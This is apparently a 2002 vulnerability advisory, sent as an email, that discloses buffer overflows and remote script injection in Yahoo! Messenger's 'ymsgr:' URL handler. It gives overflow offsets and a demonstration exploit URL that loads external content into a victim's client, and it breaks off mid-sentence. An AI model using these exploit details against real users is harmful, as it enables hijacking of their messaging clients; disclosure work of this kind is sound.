--=====================_789734017==_.ALT Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit ======================================================================= Yahoo! Instant Messenger (YIM) Hi-Jack 101 -- Multiple Vulnerabilities & Demonstration Exploit Date : 05/02/2002 Version : Yahoo! Messenger (5, 0, 0, 1061) [latest build at time] Platforms : Win98, Win2K, XP Pro (and likely all Windows versions) Severity : Medium - High Contents : 01. Summary 02. Software/Supplier Status 03. Vulnerability #1: Buffer Overflows 04. Vulnerability #2: Yahoo! Instant Messenger (YIM) Hi-Jack 101 (Remote Java Visual Basic script execution) 05. Threat Significance 06. Credits 01. Summary: At the end of 2001, Yahoo! Instant Messenger (YIM) was estimated by Jupiter Media Metrix to the ad-sponsored choice of some 12 million Instant Messaging (IM) Internet users whose numbers are increasing at over 25% per annum, http://www.ecommercetimes.com/perl/story/14793.html. Media Life, however, estimates the number of global IM users at the end of 2001 to be over 200 million with 32%, or 64 million, using Yahoo! Messenger, http://209.61.190.23/news2002/feb02/feb04/2_tues/news4tuesday.html. Security vulnerabilities in YIM have recently been found which can allow unauthorized execution of programs on a YIM user's PC via buffer overflows or Java or Visual Basic script execution added through YIM Content tabs. The net impact is to allow a relatively simple opportunity to hijack users' YIM client outright, and use it to attack or intrude into YIM users supposedly private information systems. 02. Software/Supplier Status: Yahoo! was informed of this vulnerability on 05/05/2002. In discussions with Yahoo Security the authors agreed to await Yahoo!'s release of a repaired version of Yahoo! Messenger (YIM). Yahoo! made the repaired version available for download and installation on 24/05/2002 at http://download.yahoo.com/dl/installs/ymsgr/ymsgr_1065.exe. Notably, Yahoo! removed some functionality from repaired YIM version. Specifically, according to Yahoo, the "addview" function (see below) has been removed until Yahoo! can rewrite it and provide sufficient security to prevent exploitation of the Vulnerability #2 below. 03. Vulnerability #1: Buffer Overflows When YaHoo! Messenger (YIM) is installed, it registers its own handler for URLs of the type "ymsgr". In the Win98 Registry, this handler is HKEY_LOCAL_MACHINE\Software\CLASSES\ymsgr\shell\open\command which has a value for "(Default)" of "YPAGER.EXE %1". Thus when any URL beginning with "ymsgr:" [no slashes, no "//"] is input into a web browser supported by integrated with YIM, "ypager.exe %1" is executed on the complete URL. With no proper bounds checking in the ymsgr protocol, attackers can overflow the YIM function calls "call", "sendim", "getimv", "chat", "addview", "addfriend" tags. For example, loading URL "ymsgr:call?(84)+8-8344332&p=DaHØ" into a YIM-integrated browser will cause ypager.exe will be executed and it will then execute the YIM/Net2Phone "Call Centre" application and prepare it to dial the phone number and name in the URL. If we input a string that has more than 260 bytes we will crash YIM; 264 bytes will overwrite the EBP register; four (4) more bytes will overwrite the EIP register. In total, 268 bytes are needed to cause a buffer overflow. For example, this URL ymsgr:call?+ would overwrite both the EBP (Extended Base Pointer) and EIP (Extended Instruction Pointer). The ellipsis, "...", represents an extension to 268 bytes, e.g., 0x61616161, of "a"s). From there, attackers could overwrite the EIP with any location they choose, jump to exploit code and have the code run under the current user's normal privileges. The following are susceptible to BOFs (Buffer OverFlows) as well. But this time we need to punch in another 100 bytes: ymsgr:sendim?+ ymsgr:chat?+ ymsgr:addview?+ ymsgr:addfriend?+ Another susceptibility is illustrated by "ymsgr:getimv?+", as reported to BugTraq on February 21, 2002 by "Scott Woodward" . We include it in here in case anyone wants an example of this particular exploit. 04. Vulnerability #2: Yahoo! Instant Messenger (YIM) Hi-Jack 101 (Java, Visual Basic script execution) URLs beginning with "ymsgr:addview?" let users add browser-ready Yahoo! content to YIM's "Content Tabs" for viewing in YIM, without a web browser. YIM installs with default Tabs for Stocks, Weather, Calendar, News, etc. The following URL is provided to demonstrate this vulnerability. To use it, you must have YaHoo! Messenger (YIM) installed and integrated with a compatible web browser. (We only tested this exploit on Microsoft's Internet Explorer 5.0+.) ymsgr:addview?http://rd.yahoo.com/messenger/?http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm This simple, completely harmless, sample exploit will start up YIM, if not already started, add a new "Content Tab" called "YIM Cal-Hack" to YIM's current set, then display a dialogue box with one option, "OK", then open the "YIM Cal-Hack" content, a quick, 9-click set of instructions to disable the exploit. (Send it to your friends for a laugh. ;)) To see the contents of DemH0.htm, simply remove the Yahoo! redirection parts of the exploit URL above or load this URL into any browser: http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm Note, however, that to completely remove the "YIM Cal-Hack" (before the user's next YIM upgrade a minor Windows registry edit is needed: simply exit YIM; "Find" the text string "YMSGR_test" or "YIM Cal-Hack", using Start-> Run->regedit->Edit->Find; then delete the YMSGR_test key; exit regedit; and restart YIM. Note also that DemH0.htm is not a standard HTML file -- though it calls three other standard HTML files. Instead, DemH0.htm contains only YIM- specific tags. In fact, if you insert the normal HTML opening tags, "